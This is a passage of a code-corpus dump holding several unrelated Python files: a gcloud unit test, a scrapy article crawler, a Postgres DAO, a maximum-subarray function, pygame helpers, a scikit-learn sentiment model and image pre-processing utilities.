rolling_updates_base as base\n\nmessages = core_apis.GetMessagesModule('replicapoolupdater', 'v1beta1')\n\n\nclass UpdatesListInstanceUpdatesTest(base.UpdaterMockTest):\n\n def testListInstanceUpdates(self):\n self.mocked_client_v1beta1.rollingUpdates.ListInstanceUpdates.Expect(\n messages.ReplicapoolupdaterRollingUpdatesListInstanceUpdatesRequest(\n project=self.Project(),\n zone=base.ZONE,\n rollingUpdate='some-update',\n maxResults=100,\n ),\n messages.InstanceUpdateList(\n items=[\n messages.InstanceUpdate(\n instance='http://instances/some-instance-1',\n status='ROLLED_OUT',\n ),\n messages.InstanceUpdate(\n instance='http://instances/some-instance-2',\n status='ROLLING_OUT',\n ),\n ],\n nextPageToken='1396059067464',\n ),\n )\n self.mocked_client_v1beta1.rollingUpdates.ListInstanceUpdates.Expect(\n messages.ReplicapoolupdaterRollingUpdatesListInstanceUpdatesRequest(\n project=self.Project(),\n zone=base.ZONE,\n rollingUpdate='some-update',\n pageToken='1396059067464',\n maxResults=100,\n ),\n messages.InstanceUpdateList(\n items=[\n messages.InstanceUpdate(\n instance='http://instances/some-instance-3',\n status='ROLLING_OUT',\n ),\n messages.InstanceUpdate(\n instance='http://instances/some-instance-4',\n status='ROLLED_OUT',\n ),\n ],\n nextPageToken=None,\n ),\n )\n\n self.Run(('alpha compute rolling-updates '\n '--zone=some-zone list-instance-updates some-update'))\n self.AssertOutputContains(\"\"\"\\\nINSTANCE_NAME STATUS\nsome-instance-1 ROLLED_OUT\nsome-instance-2 ROLLING_OUT\nsome-instance-3 ROLLING_OUT\nsome-instance-4 ROLLED_OUT\n\"\"\")\n\n def testListInstanceUpdates_Failure_MissingArgument_Zone(self):\n try:\n self.Run(\n 'alpha compute rolling-updates list-instance-updates some-update')\n self.fail('Expected exception has not been raised')\n except properties.RequiredPropertyError:\n self.AssertErrContains('required property [zone] is not currently set')\n\n\nif __name__ == '__main__':\n test_case.main()\n","sub_path":"google-cloud-sdk/lib/tests/unit/surface/compute/rolling_updates/list_instance_updates_test.py","file_name":"list_instance_updates_test.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"283541095","text":"# -*- coding: utf-8 -*-\n\nimport traceback\nfrom scrapy import Request\nfrom scrapy_redis.spiders import RedisSpider\nfrom crawler.consts import (TOP_LEVEL_QUEUE_WORKER_KEY, SECOND_LEVEL_QUEUE_WORKER_KEY,\n TOP_LEVEL_QUEUE_WORKER_KEY_CATE, CRAWLED_ARTICLE_SET, COME_FROM_ARTICLE_SET, LOG_PREFIX_ARTICLE_WORKER, 
GIF_ARTICLE_SET)\nfrom crawler.settings import raven_client\nfrom crawler.extractor import article_parser_readability, extract_data, normalize_title, upinsert_google_article_category\nfrom crawler.spiders.base import PreSavingMixin, UrlExtracorMixin, UrlFilterMixin\nfrom crawler.utils import gen_url_domain,get_main_domain\nfrom crawler.logging import log_error, log_analysis, log_warn, log_access, log_access_article_worker_index\nfrom crawler.image_extractor import is_photo_url\nfrom crawler.html_improver import HtmlImprover\nfrom crawler.models import SiteRule\n\nfrom nlp.classifier import (EnArticleClassifier, TYPE_ERROR, TYPE_PHOTO, TYPE_VIDEO,\n TYPE_ARTICLE)\nfrom bs4 import BeautifulSoup\n\n\nen_article_clf = EnArticleClassifier.get_instance()\n\n\nclass ArticleWorker(PreSavingMixin, UrlExtracorMixin, UrlFilterMixin, RedisSpider):\n\n redis_key = None\n name = None\n next_level_queue_key = None\n\n handle_httpstatus_list = [404]\n\n def parse(self, response):\n url = response.url\n item = {}\n try:\n log_access_article_worker_index('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1000', 'parse start', str(url)))\n if response.status == 404:\n self.add_to_crawled_set(url)\n log_warn('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1010', '404 page', str(url)))\n return item\n\n if self.is_in_crawled_set(url):\n log_warn('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1020', 'duplicated crawled', str(url)))\n #upinsert_google_article_category(url, self.server)\n return item\n self.add_to_crawled_set(url)\n html_content = ''\n try:\n html_content = response.body_as_unicode()\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'response body error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'response body error', str(url), traceback.format_exc()))\n\n html_soup = BeautifulSoup(html_content, 'lxml')\n redirects = html_soup.select('meta[http-equiv=\"refresh\"]')\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1030', 'is redirects', str(url), str(redirects)))\n if redirects:\n redirect = redirects[0]\n redirect_params = redirect.get('content')\n if redirect_params:\n split_params = redirect_params.lower().split('url=')\n if len(split_params) > 1:\n _r_url = split_params[-1]\n domain = gen_url_domain(url)\n redirect_url = _r_url if _r_url.startswith('http') else 'http://%s%s' % (domain, _r_url) \\\n if _r_url.startswith('/') else 'http://%s/%s' % (domain, _r_url)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1040', 'redirects url', str(url), str(redirect_url)))\n url_cate = self.server.hget(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n if url_cate:\n self.server.hdel(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n self.server.hset(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, redirect_url, url_cate)\n return Request(redirect_url, callback=self.parse, dont_filter=True)\n\n title, content = article_parser_readability(html_content)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1050', 'article title', str(url), str(title)))\n if not title:\n log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1060', 'title empty', str(url)))\n return item\n content_soup = BeautifulSoup(content, 'lxml')\n\n domain = gen_url_domain(url)\n\n img_src = None\n try:\n title, img_src, content_soup = HtmlImprover(title, domain, html_soup, content_soup, url).get_ans()\n except Exception 
as e:\n                log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'html improver error', str(url), traceback.format_exc()))\n                log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'html improver error', str(url), traceback.format_exc()))\n\n            # normalize the title and strip unsuitable tokens such as 'video'\n            title = normalize_title(url, title)\n            log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1080', 'normalize after', str(url), str(title), str(img_src)))\n            content = str(content_soup)\n\n            is_check = True\n            is_photo_url_rst = is_photo_url(url, html_soup)\n            log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1110', 'is photo site', str(url), str(is_photo_url_rst)))\n            if is_photo_url_rst:\n                is_check = False\n            log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1120', 'is check', str(url), str(is_check)))\n\n            base_list = ['data-src', 'src']\n\n            if img_src:\n                base_list.insert(0, img_src)\n\n            content_text = content_soup.text.replace(\n                '\\t', '').replace(\n                '\\n', '').replace(\n                '\\r', '').replace(\n                u'\\u00A0', ' ').strip()\n\n            if not content_text and is_check:\n                log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1090', 'no content', str(url)))\n                return item\n\n            if not en_article_clf.check_valid_by_language('%s' % (title)) and is_check:\n                log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1100', 'title language not english', str(url)))\n                return item\n\n            if not en_article_clf.check_valid_by_language('%s %s' % (title, content_text)) and is_check:\n                log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1100_10', 'content language not english', str(url)))\n                return item\n\n            scripts = html_soup.find_all('script')\n            for tag in scripts:\n                tag.decompose()\n\n            styles = html_soup.find_all('style')\n            for tag in styles:\n                tag.decompose()\n\n            html_content = ''.join(html_soup.stripped_strings)\n\n\n            site_type = ''\n            cate = ''\n            try:\n                site_type, cate = en_article_clf.check_site_type_and_cate(html_soup, html_content, title, content_soup, content_text, url, is_check)\n            except Exception as e:\n                log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1130', 'check site type and category error', str(url), traceback.format_exc()))\n                log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1130', 'check site type and category error', str(url), traceback.format_exc()))\n\n            log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1140', 'site type and category', str(url), str(site_type), str(cate)))\n\n            if site_type == TYPE_ERROR:\n                log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1150', 'type error', str(url), str(site_type)))\n                return item\n\n            url_cate = self.server.hget(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n            log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1160', 'site type and category', str(url), str(url_cate)))\n\n            if url_cate:\n                self.server.hdel(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n                cate = url_cate\n\n            item['ctype'] = site_type\n            item['url'] = url\n\n            if site_type in [TYPE_VIDEO]:\n                log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1170', 'site_type is video', str(url), str(site_type)))\n                return item\n\n            try:\n                data = extract_data(url, html_soup, html_content, content_soup, content, base_list)\n            except Exception as e:\n                log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1180', 'extract data error', str(url), traceback.format_exc()))\n                
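# extract_data failures are logged to both sinks and then re-raised below so the crawl records the error.\n                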
log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1180', 'extract data error', str(url), traceback.format_exc()))\n raise\n\n data['title'] = title\n data['text'] = content_text\n\n data['cate'] = en_article_clf.gen_full_cates(cate)\n item['data'] = data\n\n mainDomain = get_main_domain(domain)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1190', 'site domain and mainDomain', str(url), str(domain), str(mainDomain)))\n\n current_site_name = None\n for d in [domain, mainDomain]:\n current_site_name, quality, entertaining = SiteRule.get_rule_by_domain(d)\n if current_site_name:\n break\n\n is_in_come_from_set = self.server.sismember(COME_FROM_ARTICLE_SET, url)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1200', 'site come from and site name', str(url), str(is_in_come_from_set), str(current_site_name)))\n\n is_gif_set = self.server.sismember(GIF_ARTICLE_SET, url)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1201', 'site come from and site name', str(url), str(is_in_come_from_set), str(current_site_name)))\n\n if not current_site_name and is_in_come_from_set == False and is_gif_set == False:\n log_error('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1210', 'article site domain not in db', str(url), str(site_type), str(is_in_come_from_set)))\n return\n # if current_site_name == 'Business Today':\n # return item\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1220', 'article item', str(url), repr(item)))\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1999', 'article worker error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1999', 'article worker error', str(url), traceback.format_exc()))\n return item\n\nclass TopLevelWorker(ArticleWorker):\n name = 'top_worker'\n redis_key = TOP_LEVEL_QUEUE_WORKER_KEY\n next_level_queue_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n\nclass SecondLevelWorker(ArticleWorker):\n name = 'second_worker'\n redis_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n next_level_queue_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n","sub_path":"chaos/crawler/spiders/article_worker.py","file_name":"article_worker.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"17369922","text":"from config.dbconfig import pg_config\nimport psycopg2\n\n\nclass PayMethodDAO:\n def __init__(self):\n\n connection_url = \"dbname=%s user=%s password=%s\" % (pg_config['dbname'],\n pg_config['user'],\n pg_config['passwd'])\n self.conn = psycopg2._connect(connection_url)\n\n def getAllPayMethod(self):\n cursor = self.conn.cursor()\n query = \"select * from paymethod;\"\n cursor.execute(query)\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getPayMethodById(self, payid):\n cursor = self.conn.cursor()\n query = \"select * from paymethod where pay_id = %s;\"\n cursor.execute(query, (payid,))\n result = cursor.fetchone()\n return result\n\n def getPayMethodByName(self, pmname):\n cursor = self.conn.cursor()\n query = \"select * from pay_method where pmname = %s;\"\n cursor.execute(query, (pmname,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getConsumerByPayMethodId(self, pmid):\n cursor = self.conn.cursor()\n query = \"select consid, 
consusername from consumer natural inner join pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getSupplierByPayMethodId(self, pmid):\n cursor = self.conn.cursor()\n query = \"select sid, susername, scompany from supplier natural inner join pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def insert(self, card_no, first_name, last_name, exp_date, consumer_id):\n cursor = self.conn.cursor()\n query = \"insert into paymethod(card_no, first_name, last_name, exp_date, consumer_id) \" \\\n \"values (%s, %s, %s, %s, %s) returning pay_id;\"\n cursor.execute(query, (card_no, first_name, last_name, exp_date, consumer_id,))\n pay_id = cursor.fetchone()[0]\n self.conn.commit()\n return pay_id\n\n def update(self, pmid, pmname):\n cursor = self.conn.cursor()\n query = \"update pay_method set pmname = %s where pmid = %s;\"\n cursor.execute(query, (pmname, pmid,))\n self.conn.commit()\n return pmid\n\n def delete(self, pmid):\n cursor = self.conn.cursor()\n query = \"delete from pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n self.conn.commit()\n return pmid\n","sub_path":"dao/paymethod.py","file_name":"paymethod.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"119788828","text":"def maxium_sub_arr(arr,low,high):\n if low == high - 1:\n return (low,high,arr[low])\n mid = int((low + high)/2)\n left = maxium_sub_arr(arr,low,mid)\n right = maxium_sub_arr(arr,mid,high)\n cross = maxium_cross_sub_arr(arr,low,mid,high)\n if left[2] >= right[2] and left[2] >= cross[2]:\n return left\n elif right[2] >= left[2] and right[2] >= cross[2]:\n return right\n else:\n return cross\n\ndef maxium_cross_sub_arr(arr,low,mid,high):\n left_sum = float(\"-inf\")\n sum = 0\n i = mid\n while i >= low:\n sum = sum + arr[i]\n if sum > left_sum:\n left_sum = sum\n max_left = i\n i = i - 1\n\n right_sum = float(\"-inf\")\n sum = 0\n j = mid + 1\n while j <= high:\n sum = sum + arr[j]\n if sum > right_sum:\n right_sum = sum\n max_right = j\n j = j + 1\n return max_left,max_right,left_sum+right_sum\n\nsample = [13,-3,-25,20,-3,-16,-23,18,20,-7,12,-5,-22,15,-4,7]\nprint(maxium_sub_arr(sample,0,len(sample)-1))","sub_path":"algorithm/maxium_sub_arr.py","file_name":"maxium_sub_arr.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"59019233","text":"import pygame\n\nblocks = [] # List to hold the blocks\ntiles = [] # List to hold the tiles\nliquids = [] # List to hold the liquid tiles\n\nclass Block(object):\n\t\n\tdef __init__(self, pos):\n\t\tblocks.append(self)\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\nclass Tile(Block):\n\n\tdef __init__(self, pos):\n\t\ttiles.append(self)\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\nclass Liquid(Block):\n\n\tdef __init__(self, pos, liquidType):\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\t\tself.type = liquidType\n\t\tself.effects = \"none\"\n\t\tif self.type == \"water\":\n\t\t\tself.effects = \"none\"\n\t\telif self.type == \"spring\":\n\t\t\tself.effects = \"regen\"\n\t\telif self.type == \"lava\":\n\t\t\tself.effects = \"fireDamage\"\n\t\telse:\n\t\t\tself.effects = \"none\"\n\tdef applyEffects(self, 
player):\n\t\tplayer.effects.append(self.effects)","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262654532","text":"import random\ndef Test():\n    n=int(input())\n    nums=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n    nums.sort()\n    save=[]\n    for x in nums:\n        save.append(x)\n    result=n\n    jump=False\n    i=1\n    while(i<=n and len(nums)>1):\n        temp=min(nums)\n        if(i>temp):\n            if(check(i,nums)):\n                nums.remove(temp)\n                save.remove(temp)\n                i=i-1\n            else:\n                result=i\n                jump=True\n                break\n        else:\n            nums.remove(temp)\n        i=i+1\n    if(jump):\n        print(result)\n    else:\n        a=random.randint(0,2)\n        print(len(save))\n        if(a==1):\n            print(save)\n\ndef check(i,nums):\n    for x in nums:\n        if(x>=i):\n            return True\n    return False\nif __name__ == \"__main__\":\n    Test()","sub_path":"Code/CodeRecords/2786/60595/251518.py","file_name":"251518.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195578793","text":"from sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport pickle\n\ndata_df = pd.read_csv('data/final.csv')\n# remove the \"Neutral\" class\ndata_df = data_df[data_df['sentiment'] != \"neutral\"]\n\n# change values to numeric\ndata_df['sentiment'] = data_df['sentiment'].map({'positive': 1, 'negative': 0})\n\n# drop rows with missing values before splitting out the features and labels\ndata_df = data_df.dropna()\n\n# identify the data and the labels\ndata = data_df['text']\ntarget = data_df['sentiment']\n\n# Use TfidfVectorizer for feature extraction (TFIDF to convert textual data to numeric form):\ntf_vec = TfidfVectorizer()\nX = tf_vec.fit_transform(data)\n\n# Training Phase\nX_train, X_test, y_train, y_test = train_test_split(X, target, test_size=0.50, random_state=0)\n\nmlp = MLPClassifier(hidden_layer_sizes=(13,13,13),max_iter=500)\nmlp.fit(X_train,y_train)\npredictions = mlp.predict(X_test)\nprint(predictions)\nprint(classification_report(y_test,predictions))\n\nwith open(\"models/arabic_sentiment_NN_tokenizer.pickle\", \"wb\") as f:\n    pickle.dump(tf_vec, f)\nwith open(\"models/arabic_sentiment_NN.pickle\", \"wb\") as f:\n    pickle.dump(mlp, f)","sub_path":"mlp_model.py","file_name":"mlp_model.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"568741847","text":"# coding=utf-8\n__author__ = 'pythme'\n\n\"\"\"\n\nObjects that can be used directly in a for loop are collectively called iterables: Iterable\n \n isinstance() checks whether an object is an Iterable\n >>> from collections import Iterable\n >>> isinstance([], Iterable)\n True\n >>> isinstance({}, Iterable)\n True\n >>> isinstance('abc', Iterable)\n True\n >>> isinstance((x for x in range(10)), Iterable)\n True\n >>> isinstance(100, Iterable)\n False\n \n A generator can not only be used in a for loop, it can also be called repeatedly with next() to return the next value,\n until it finally raises StopIteration to signal that no further value can be returned; hence a generator is an iterable.\n\n[An object that can be called with next() and keeps returning the next value is called an iterator: Iterator]\n\n Every generator is an Iterator object, but list, dict and str, although Iterable, are not Iterators.\n\n An Iterable such as list, dict or str can be turned into an Iterator with the iter() function\n >>> isinstance(iter([]), Iterator)\n True\n >>> isinstance(iter('abc'), Iterator)\n True\n\n\nAn Iterator can even represent an infinitely large data stream: it can be called with next() and keeps returning the next item until it raises StopIteration when no data is left.\nFor example, the set of all natural numbers - a list could never store all of them.\n\n\"\"\"\n\n\n\"\"\"\n[Summary]\n\nAnything that can be used in a for loop is of type Iterable;\nanything that can be used with next() is of type Iterator; Iterators represent lazily computed sequences, and a generator is itself an iterator over an iterable.\n\nCollection types such as list, dict and str are Iterable but not Iterator, but an Iterator can be obtained from them with the iter() function.\nPython's for loop is essentially implemented by calling next() repeatedly.\n\n    for x in [1, 2, 3, 4, 5]:\n        pass\n    is in fact completely equivalent to:\n    \n    # first obtain an Iterator object:\n    it = iter([1, 2, 3, 4, 5])\n    # loop:\n    while True:\n        try:\n            # get the next value:\n            x = next(it)\n        except StopIteration:\n            # StopIteration means the loop is over\n            break\n\n\"\"\"\n\n","sub_path":"4_高级特性/4_Iterator.py","file_name":"4_Iterator.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97874523","text":"# -*- coding: utf-8 -*-\nimport pygame\nfrom graphalama.borg import Borg\nborg_baby = Borg()\n\npygame.init()\npygame.key.set_repeat(50, 5)\n\n\nclass Inputs(dict):\n    \"\"\"Keeps track of all the inputs.\n    Contains A, B, X, Y, DOWN, UP, RIGHT, LEFT, QUIT and PAUSE.\"\"\"\n\n    def __init__(self):\n\n        # noinspection PyTypeChecker\n        dict.__init__(self)\n\n        # simplification\n        key_dict = {'is pressed': False, 'just pressed': False, 'press time': -1}\n\n        # keyboard\n        self['right arrow'] = dict(key_dict)\n        self['left arrow'] = dict(key_dict)\n        self['up arrow'] = dict(key_dict)\n        self['down arrow'] = dict(key_dict)\n        self['space bar'] = dict(key_dict)\n        self['tab'] = dict(key_dict)\n        self['enter'] = dict(key_dict)\n        self['F12'] = dict(key_dict)\n        self['alt'] = dict(key_dict)\n        self['F4'] = dict(key_dict)\n        self['close'] = dict(key_dict)\n        self['escape'] = dict(key_dict)\n        # mouse click\n        self['left click'] = dict(key_dict)\n        self['middle click'] = dict(key_dict)\n        self['right click'] = dict(key_dict)\n\n        # special\n        self['screen'] = {'change': False, 'size': (0, 0), 'fullscreen': True}\n        self['mouse'] = {'real x': 0, 'real y': 0, 'rel x': 0, 'rel y': 0, 'scroll': 0}\n\n        self.list_events = []\n\n        self['screen']['size'] = borg_baby.SCREEN_SIZE\n\n    @property\n    def mouse_click(self):\n        # if there's a click somewhere\n        return self['left click']['just pressed'] or self['middle click']['just pressed'] or self['right click'][\n            'just pressed']\n\n    def press(self, key):\n        self[key]['is pressed'] = True\n        self[key]['just pressed'] = True\n        self[key]['press time'] = 0\n\n    def unpress(self, key):\n        self[key]['is pressed'] = False\n        self[key]['just pressed'] = False\n        self[key]['press time'] = -1\n\n    def update(self):\n\n        self.list_events = pygame.event.get()\n\n        mouse_pos = pygame.mouse.get_pos()\n        self['mouse']['real x'] = mouse_pos[0]\n        self['mouse']['real y'] = mouse_pos[1]\n        self['mouse']['rel x'] = mouse_pos[0] / self['screen']['size'][0] # I can't be more precise\n        self['mouse']['rel y'] = mouse_pos[1] / self['screen']['size'][1] # idem\n        self['mouse']['scroll'] = 0\n\n        # reset every 'just pressed' value so a key press is not reported more than once\n        for key, sub_dict in self.items():\n            if 'just pressed' in sub_dict: # dict.has_key() is gone in Python 3, so use the in operator\n                sub_dict['just pressed'] = False\n        self['screen']['change'] = False\n\n        # increment all the press-time counters if needed\n        for key, sub_dict in self.items():\n            if 'is pressed' in sub_dict:\n                if sub_dict['is pressed']:\n                    sub_dict['press time'] += 1\n\n        for event in self.list_events:\n            # the window close button\n            if event.type == pygame.QUIT: # check the event type\n                self['close']['is pressed'] = True\n\n            # keyboard\n            # a key was pressed\n            if event.type == pygame.KEYDOWN: # check the event type\n                if event.key == pygame.K_RIGHT: # check which key it is\n                    self.press('right arrow')\n                elif event.key == pygame.K_LEFT: # check which key it is\n                    self.press('left arrow')\n                elif event.key == pygame.K_UP:\n                    self.press('up arrow')\n                elif event.key == pygame.K_DOWN:\n                    self.press('down arrow')\n                elif event.key == pygame.K_SPACE:\n                    self.press('space bar')\n                elif event.key == pygame.K_RALT or event.key == pygame.K_LALT:\n                    self.press('alt')\n                elif event.key == pygame.K_F4: # check which key it is\n                    self.press('F4')\n                elif event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER:\n                    self.press('enter')\n                elif event.key == pygame.K_F12:\n                    self.press('F12')\n                elif event.key == pygame.K_TAB:\n                    self.press('tab')\n                elif event.key == pygame.K_ESCAPE:\n                    self.press('escape')\n            # key released\n            elif event.type == pygame.KEYUP: # check the event type\n                if event.key == pygame.K_RIGHT: # check which key it is\n                    self.unpress('right arrow')\n                elif event.key == pygame.K_LEFT: # check which key it is\n                    self.unpress('left arrow')\n                elif event.key == pygame.K_UP: # check which key it is\n                    self.unpress('up arrow')\n                elif event.key == pygame.K_SPACE:\n                    self.unpress('space bar')\n                elif event.key == pygame.K_DOWN: # check which key it is\n                    self.unpress('down arrow')\n                elif event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER:\n                    self.unpress('enter')\n                elif event.key == pygame.K_F12:\n                    self.unpress('F12')\n                elif event.key == pygame.K_TAB:\n                    self.unpress('tab')\n                elif event.key == pygame.K_ESCAPE:\n                    self.unpress('escape')\n\n\n            # mouse clicks\n            elif event.type == pygame.MOUSEBUTTONDOWN: # check the event type\n                if event.button == 1: # check which button: 1 = left\n                    self.press('left click')\n                elif event.button == 2: # check which button: 2 = middle (wheel) click\n                    self.press('middle click')\n                elif event.button == 3: # check which button: 3 = right click\n                    self.press('right click')\n                elif event.button == 4:\n                    self['mouse']['scroll'] = -1\n                elif event.button == 5:\n                    self['mouse']['scroll'] = 1\n            elif event.type == pygame.MOUSEBUTTONUP: # check the event type\n                if event.button == 1: # check which button: 1 = left\n                    self.unpress('left click')\n                if event.button == 2: # check which button: 2 = middle (wheel) click\n                    self.unpress('middle click')\n                if event.button == 3: # check which button: 3 = right click\n                    self.unpress('right click')\n            # window resize\n            elif event.type == pygame.VIDEORESIZE: # check the event type\n                self['screen']['change'] = True\n                self['screen']['size'] = event.size\n\n__all__ = ['Inputs']\n","sub_path":"graphalama/inputs.py","file_name":"inputs.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"287102939","text":"import os\nfrom os.path import join\nimport glob\nimport shutil\nimport cv2\nfrom utils import automkdir\n\n'''\nGeneral purpose pre-processing functions up until training begins.\n'''\n\n# Copies images from one directory to another\ndef copy_to_loc(path, stop, name='new_folder', img_format='png'):\n    folders = sorted(glob.glob(join(path, '*')))\n    print(\"Folder list: {}\".format(folders))\n    for folder in folders:\n        save_path = join(folder, name)\n        automkdir(save_path)\n        img_path = join(folder, 
'truth_downsize_2')\n imgs = sorted(glob.glob(join(img_path, '*.{}'.format(img_format))))\n for i in range(stop):\n shutil.copy2(imgs[i], save_path)\n print(\"Successfully copied the first {} files from {} into {}\"\n .format(stop, img_path, save_path))\n\n\n\n'''This function accepts an input path, scale, name and image format as parameters\nIt finds all of the folders in the input path and for each folder, it will resize each of the\nground-truth images by the scale factor and save the files according to the name supplied'''\ndef resize_imgs_truth(path, scale=0.5, name='resize', img_format='png'):\n folders = sorted(glob.glob(join(path, '*')))\n # print(\"Folder list: {}\".format(folders))\n for folder in folders:\n save_path = join(folder, name)\n automkdir(save_path)\n # print(\"Saved directory is: {}\".format(save_path))\n img_path = join(folder, 'truth')\n # print(\"Input path: {}\".format(img_path))\n imgs = sorted(glob.glob(join(img_path, '*.{}'.format(img_format))))\n # print(os.listdir(img_path))\n for img in range(len(imgs)):\n original = cv2.imread(imgs[img], cv2.IMREAD_UNCHANGED)\n modified = cv2.resize(original, (0, 0), fx=scale, fy=scale)\n filename = os.listdir(img_path)[img]\n cv2.imwrite(join(save_path, filename), modified)\n # print(filename)\n print('Successfully resized {} images by a scale of {} at {}'.format(len(imgs), scale, save_path))\n return print('Resize images concluded')\n\n\n# Resize images by half using the resize method\ndef resize_img(img_path, scale=0.5):\n original = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n # print(\"original shape: {}\".format(original.shape))\n modified = cv2.resize(original, (0, 0), fx=scale, fy=scale)\n # print(\"modified shape: {}\".format(modified.shape))\n # cv2.imshow('Original', original)\n # cv2.imshow('Modified', modified)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n return modified\n\n\n# Convert a video sequence into frames\ndef vid_to_frame(vid_name, format='png'):\n vid_path = \"test\\\\additional\\\\{}\".format(vid_name)\n save_path = 'test\\\\additional\\\\{}'.format(vid_name.rstrip('.mp4'))\n automkdir(save_path)\n vid_capture = cv2.VideoCapture(vid_path)\n success, image = vid_capture.read()\n count = 0\n while success:\n # cur_frame = \"frame%d.png\" % count\n cv2.imwrite(save_path + \"\\\\frame%d.png\" % count, image)\n success, image = vid_capture.read()\n print(\"Read frame {} {}\".format(count, success))\n count += 1\n","sub_path":"utilities/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 